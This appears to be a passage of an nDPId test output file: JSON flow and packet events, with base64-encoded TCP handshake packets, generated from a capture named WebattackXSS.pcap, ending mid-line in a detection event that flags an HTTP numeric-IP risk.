-00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":451,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":32,"flow_packet_id":1,"flow_last_seen":1499347016455,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347016455,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8hwdAAD4GPsmsEAABwKgKMs4AAFB8BZCLAAAAAKACchBrXQAAAgQFtAQCCAoBOReMAAAAAAEDAwc="} 
-00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":452,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":32,"flow_packet_id":2,"flow_last_seen":1499347016455,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347016455,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQzgBumELLfAWQjKAScSDN8gAAAgQFtAQCCAoD4ukDATkXjAEDAwc="} -00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":453,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":32,"flow_packet_id":3,"flow_last_seen":1499347016455,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347016455,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0hwhAAD4GPtCsEAABwKgKMs4AAFB8BZCMbphCzIAQAOVs+gAAAQEICgE5F4wD4ukD"} -00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":463,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347017745,"flow_last_seen":1499347017745,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347017745,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52750,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":463,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":33,"flow_packet_id":1,"flow_last_seen":1499347017745,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347017745,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8p+RAAD4GHeysEAABwKgKMs4OAFCFw78rAAAAAKACchAxrgAAAgQFtAQCCAoBORjPAAAAAAEDAwc="} -00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":464,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":33,"flow_packet_id":2,"flow_last_seen":1499347017745,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347017745,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQzg5V15svhcO\/LKAScSBTXgAAAgQFtAQCCAoD4upFATkYzwEDAwc="} -00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":465,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":33,"flow_packet_id":3,"flow_last_seen":1499347017746,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347017746,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0p+VAAD4GHfOsEAABwKgKMs4OAFCFw78sVdebMIAQAOXyZQAAAQEICgE5GM8D4upF"} 
-00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":481,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347020329,"flow_last_seen":1499347020329,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347020329,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52776,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":481,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":34,"flow_packet_id":1,"flow_last_seen":1499347020329,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347020329,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8BsFAAD4Gvw+sEAABwKgKMs4oAFCq7R2UAAAAAKACchCrewAAAgQFtAQCCAoBORtVAAAAAAEDAwc="} -00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":482,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":34,"flow_packet_id":2,"flow_last_seen":1499347020329,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347020329,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQzijgzD+Kqu0dlaAScSCbVAAAAgQFtAQCCAoD4uzMATkbVQEDAwc="} 
-00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":483,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":34,"flow_packet_id":3,"flow_last_seen":1499347020330,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347020330,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0BsJAAD4GvxasEAABwKgKMs4oAFCq7R2V4Mw\/i4AQAOU6XAAAAQEICgE5G1UD4uzM"} -00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":496,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347021621,"flow_last_seen":1499347021621,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347021621,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52790,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":496,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":35,"flow_packet_id":1,"flow_last_seen":1499347021621,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347021621,"pkt":"ABm5CmnxAMGxFOsxCABFAAA899BAAD4Gzf+sEAABwKgKMs42AFBUD+tIAAAAAKACchAzVAAAAgQFtAQCCAoBORyYAAAAAAEDAwc="} 
-00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":497,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":35,"flow_packet_id":2,"flow_last_seen":1499347021621,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347021621,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQzjY7BBUuVA\/rSaAScSDyDwAAAgQFtAQCCAoD4u4OATkcmAEDAwc="} -00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":498,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":35,"flow_packet_id":3,"flow_last_seen":1499347021622,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347021622,"pkt":"ABm5CmnxAMGxFOsxCABFAAA099FAAD4GzgasEAABwKgKMs42AFBUD+tJOwQVL4AQAOWRFwAAAQEICgE5HJgD4u4O"} -00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":514,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347024196,"flow_last_seen":1499347024196,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347024196,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52816,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":514,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":36,"flow_packet_id":1,"flow_last_seen":1499347024196,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347024196,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8zI9AAD4G+UCsEAABwKgKMs5QAFAU3NOUAAAAAKACchCHngAAAgQFtAQCCAoBOR8bAAAAAAEDAwc="} -00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":515,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":36,"flow_packet_id":2,"flow_last_seen":1499347024196,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347024196,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQzlADb\/iqFNzTlaAScSCX7gAAAgQFtAQCCAoD4vCSATkfGwEDAwc="} -00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":516,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":36,"flow_packet_id":3,"flow_last_seen":1499347024197,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347024197,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0zJBAAD4G+UesEAABwKgKMs5QAFAU3NOVA2\/4q4AQAOU29QAAAQEICgE5HxwD4vCS"} 
-00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":523,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347025509,"flow_last_seen":1499347025509,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347025509,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52830,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":523,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":37,"flow_packet_id":1,"flow_last_seen":1499347025509,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347025509,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8MX5AAD4GlFKsEAABwKgKMs5eAFDxhxEaAAAAAKACchBsFgAAAgQFtAQCCAoBOSBkAAAAAAEDAwc="} -00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":524,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":37,"flow_packet_id":2,"flow_last_seen":1499347025510,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347025510,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQzl7gFzLu8YcRG6AScSBkMQAAAgQFtAQCCAoD4vHbATkgZAEDAwc="} 
-00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":525,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":37,"flow_packet_id":3,"flow_last_seen":1499347025510,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347025510,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0MX9AAD4GlFmsEAABwKgKMs5eAFDxhxEb4Bcy74AQAOUDOQAAAQEICgE5IGQD4vHb"} -00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":544,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347028086,"flow_last_seen":1499347028086,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347028086,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52856,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":544,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":38,"flow_packet_id":1,"flow_last_seen":1499347028086,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347028086,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8aaVAAD4GXCusEAABwKgKMs54AFBiKUtNAAAAAKACchC+owAAAgQFtAQCCAoBOSLoAAAAAAEDAwc="} 
-00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":545,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":38,"flow_packet_id":2,"flow_last_seen":1499347028086,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347028086,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQznggYwiEYilLTqAScSCeWQAAAgQFtAQCCAoD4vRfATki6AEDAwc="} -00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":546,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":38,"flow_packet_id":3,"flow_last_seen":1499347028087,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347028087,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0aaZAAD4GXDKsEAABwKgKMs54AFBiKUtOIGMIhYAQAOU9YQAAAQEICgE5IugD4vRf"} -00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":553,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347029372,"flow_last_seen":1499347029372,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347029372,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52870,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":553,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":39,"flow_packet_id":1,"flow_last_seen":1499347029372,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347029372,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8qGFAAD4GHW+sEAABwKgKMs6GAFAx0YxIAAAAAKACchCssQAAAgQFtAQCCAoBOSQpAAAAAAEDAwc="} -00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":554,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":39,"flow_packet_id":2,"flow_last_seen":1499347029372,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347029372,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQzoZSq4KNMdGMSaAScSDe1AAAAgQFtAQCCAoD4vWgATkkKQEDAwc="} -00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":555,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":39,"flow_packet_id":3,"flow_last_seen":1499347029373,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347029373,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0qGJAAD4GHXasEAABwKgKMs6GAFAx0YxJUquCjoAQAOV92wAAAQEICgE5JCoD4vWg"} 
-00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":568,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":40,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347030639,"flow_last_seen":1499347030639,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347030639,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52884,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":568,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":40,"flow_packet_id":1,"flow_last_seen":1499347030639,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347030639,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8jW9AAD4GOGGsEAABwKgKMs6UAFA36qgJAAAAAKACchCJjAAAAgQFtAQCCAoBOSVmAAAAAAEDAwc="} -00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":569,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":40,"flow_packet_id":2,"flow_last_seen":1499347030639,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347030639,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQzpQiO+l4N+qoCqAScSCD9wAAAgQFtAQCCAoD4vbdATklZgEDAwc="} 
-00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":570,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":40,"flow_packet_id":3,"flow_last_seen":1499347030640,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347030640,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0jXBAAD4GOGisEAABwKgKMs6UAFA36qgKIjvpeYAQAOUi\/wAAAQEICgE5JWYD4vbd"} -00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":583,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347033203,"flow_last_seen":1499347033203,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347033203,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52910,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":583,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":41,"flow_packet_id":1,"flow_last_seen":1499347033203,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347033203,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8AN5AAD4GxPKsEAABwKgKMs6uAFDsGCc5AAAAAKACchBTkwAAAgQFtAQCCAoBOSfnAAAAAAEDAwc="} 
-00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":584,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":41,"flow_packet_id":2,"flow_last_seen":1499347033204,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347033204,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQzq5aBdhx7BgnOqAScSAkugAAAgQFtAQCCAoD4vleATkn5wEDAwc="} -00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":585,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":41,"flow_packet_id":3,"flow_last_seen":1499347033204,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347033204,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0AN9AAD4GxPmsEAABwKgKMs6uAFDsGCc6WgXYcoAQAOXDwQAAAQEICgE5J+cD4vle"} -00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":595,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347034467,"flow_last_seen":1499347034467,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347034467,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52924,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":595,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":42,"flow_packet_id":1,"flow_last_seen":1499347034467,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347034467,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8rP1AAD4GGNOsEAABwKgKMs68AFB+VYXeAAAAAKACchBhZwAAAgQFtAQCCAoBOSkjAAAAAAEDAwc="} -00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":596,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":42,"flow_packet_id":2,"flow_last_seen":1499347034467,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347034467,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQzrxiNhMTflWF36AScSDufwAAAgQFtAQCCAoD4vqaATkpIwEDAwc="} -00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":597,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":42,"flow_packet_id":3,"flow_last_seen":1499347034468,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347034468,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0rP5AAD4GGNqsEAABwKgKMs68AFB+VYXfYjYTFIAQAOWNhwAAAQEICgE5KSMD4vqa"} 
-00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":607,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":43,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347035750,"flow_last_seen":1499347035750,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347035750,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52938,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":607,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":43,"flow_packet_id":1,"flow_last_seen":1499347035750,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347035750,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8OG5AAD4GjWKsEAABwKgKMs7KAFDI6hIKAAAAAKACchCJVwAAAgQFtAQCCAoBOSpkAAAAAAEDAwc="} -00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":608,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":43,"flow_packet_id":2,"flow_last_seen":1499347035750,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347035750,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQzsrSHYegyOoSC6AScSAwugAAAgQFtAQCCAoD4vvbATkqZAEDAwc="} 
-00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":609,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":43,"flow_packet_id":3,"flow_last_seen":1499347035751,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347035751,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0OG9AAD4GjWmsEAABwKgKMs7KAFDI6hIL0h2HoYAQAOXPwQAAAQEICgE5KmQD4vvb"} -01116{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":622,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1499347033203,"flow_last_seen":1499347037012,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":585,"flow_tot_l4_payload_len":585,"flow_avg_l4_payload_len":146,"midstream":0,"thread_ts_msec":1499347037012,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52910,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": 